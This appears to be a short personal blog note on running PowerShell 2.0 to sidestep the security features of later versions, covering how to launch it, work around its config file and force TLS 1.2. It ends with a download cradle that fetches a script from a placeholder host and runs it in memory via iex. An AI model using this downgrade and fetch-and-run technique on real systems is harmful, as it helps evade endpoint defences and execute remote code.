PowerShell 2 Notes
As it is widely known, PowerShel 2.0 does not include the security features that were introduced in later versions. Because of this it can be a great way to avoid certain protection mechanisms.
The other day I was trying to execute something in-memory in PS2, and ran into issues. This post is just a note for myself.
By default PowerShell 2.0 can be executed with the binary:
c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
With the command::
powershell.exe -version 2
The first problem was that the folder contains a 'powershell.exe.config' file, which is written for later PS versions (and PS2 is not supported anymore). To solve this issue, just copy powershell.exe to another directory and execute it from there.
However, PS2 does not use TLS1.2 by default, so many downloads will fail with the following message:
DownloadString : Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: An unexpected error occurred on a send."
The solution is setting the protocol (after starting PS2 as written above) to a value by casting (value is unknown to the PS2 enum):
$p = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);
[System.Net.ServicePointManager]::SecurityProtocol = $p;
After this, downloads can be started the usual way:
(new-object system.net.webclient).DownloadString('https://example.com/file.ps1') | iex